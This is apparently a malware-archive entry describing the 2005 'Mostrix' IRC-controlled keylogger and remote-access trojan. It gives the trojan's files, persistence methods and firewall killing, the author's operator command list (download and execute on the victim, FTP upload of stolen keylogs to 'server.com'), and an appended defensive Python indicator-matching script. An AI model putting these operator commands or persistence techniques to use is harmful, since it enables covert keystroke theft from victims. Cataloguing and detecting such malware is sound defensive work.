.: Mostrix :.
Released 16 years, 4 months ago. Jun 2005 by DiA
- Coded by: DiA
- Version: Mostrix
- Released date: Jun 2005, 16 years, 4 months ago.
- Family: Mostrix
- Category: Remote Access
Server:

dropped files:
- c:\WINDOWS\MStr.exe Size: 10,240 bytes
- c:\WINDOWS\mslog\070206.sys Size: 127 bytes

startup:
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "MS.trix" data: C:\WINDOWS\MStr.exe

attempts to connect to an IRC Server

tested on Windows XP
February 07, 2006

features:
- install itself into system with 4 methods:
  > first try to copy to windows folder and do autostart registry entry
  > if Mostrix can't write to registry it edits win.ini in windows folder
  > if Mostrix can't write to windows directory it tries to copy itself to startup folder
  > if it can't copy to startup folder, it edits autoexec.bat in C:\
- log every key event and foreground windows and save all logs under current date .sys in windows directory under subdir "mslog"
- kill some favorite firewalls and internet security suites
- connect to irc.freenode.net and accept private commands in chan "mostrix"
- reconnect every half hour

commands:
- every command is only accepted at private chat!

systeminfo 'temporary file path'
ae: systeminfo 'C:\info.txt'
> this command gets some info about infected system and saves it in a temporary file...

dirlist 'directory to list' 'temporary file path'
ae: dirlist 'C:\' 'C:\C_drive_dirs.txt'
> this command lists all sub directories in a temporary file...

filelist 'directory to list' 'temporary file path'
ae: filelist 'C:\' 'C:\C_drive_files.txt'
> this command lists all files in one directory and saves it in a temporary file...

delete 'file to delete'
ae: delete 'C:\C_drive_files.txt'
> this command deletes a file, just use it to remove your temporary files...

execute 'application to execute'
ae: execute 'C:\Windows\Notepad.exe'
> this command executes an application, maybe one you downloaded to the infected computer...

download 'http:// url file to download' 'save path'
ae: download '--/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\--' 'C:\nice.exe'
> downloads a file via http protocol to local infected computer...

upload 'file to upload' 'ftp server' 'user' 'password'
ae: upload 'C:\info.txt' 'server.com' 'user' 'drowssap'
> this command uploads a local file of infected computer to your ftp server, name at ftp server is the same on disk...

steal a log:
Let's say you want a keylog from the 7th of June 2005, just do so (imagining "Windows" is the windows directory):
upload 'C:\Windows\mslog\070605.sys' 'server.com' 'user' 'pass'

DiA
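Added example, not part of the original entry or of DiA's readme: a triage check that matches the host indicators listed above (MStr.exe in the Windows folder, the "MS.trix" Run value, and mslog\DDMMYY.sys keylog files) against a file listing and a Run-key export, and decodes each keylog file name into the day it covers. The function names, the input shapes and the 20YY century are assumptions made for this example.

```python
import re
from datetime import date

# Indicators taken from the entry above; compared case-insensitively.
DROPPED_EXE = r"\windows\mstr.exe"
RUN_VALUE = "MS.trix"
# Keylog files: <windows dir>\mslog\DDMMYY.sys (070206.sys was seen on 7 Feb 2006).
LOG_RE = re.compile(r"\\mslog\\(\d{2})(\d{2})(\d{2})\.sys$", re.IGNORECASE)

def keylog_date(path):
    """Return the date encoded in a Mostrix keylog file name, or None."""
    m = LOG_RE.search(path)
    if not m:
        return None
    dd, mm, yy = (int(g) for g in m.groups())
    try:
        return date(2000 + yy, mm, dd)  # assumption: two-digit year means 20YY
    except ValueError:                  # right shape, impossible date
        return None

def triage(file_paths, run_values):
    """file_paths: full paths from a host listing.
    run_values: dict of value name -> data exported from the HKLM Run key."""
    findings = []
    for p in file_paths:
        if p.lower().endswith(DROPPED_EXE):
            findings.append(("dropped_exe", p))
        d = keylog_date(p)
        if d:
            findings.append(("keylog", p, d.isoformat()))
    for name, data in run_values.items():
        if name.lower() == RUN_VALUE.lower() or data.lower().endswith(DROPPED_EXE):
            findings.append(("run_key", name, data))
    return findings

# Constructed sample input (not taken from a real host).
SAMPLE_FILES = [
    r"C:\WINDOWS\MStr.exe",
    r"C:\WINDOWS\mslog\070206.sys",
    r"C:\WINDOWS\mslog\070605.sys",
    r"C:\WINDOWS\mslog\991399.sys",
    r"C:\WINDOWS\notepad.exe",
]
SAMPLE_RUN = {"MS.trix": r"C:\WINDOWS\MStr.exe",
              "ctfmon": r"C:\WINDOWS\system32\ctfmon.exe"}

if __name__ == "__main__":
    for finding in triage(SAMPLE_FILES, SAMPLE_RUN):
        print(finding)
```

The fallback install methods (win.ini, startup folder, autoexec.bat) are not covered because the entry does not give the exact lines or file names written there.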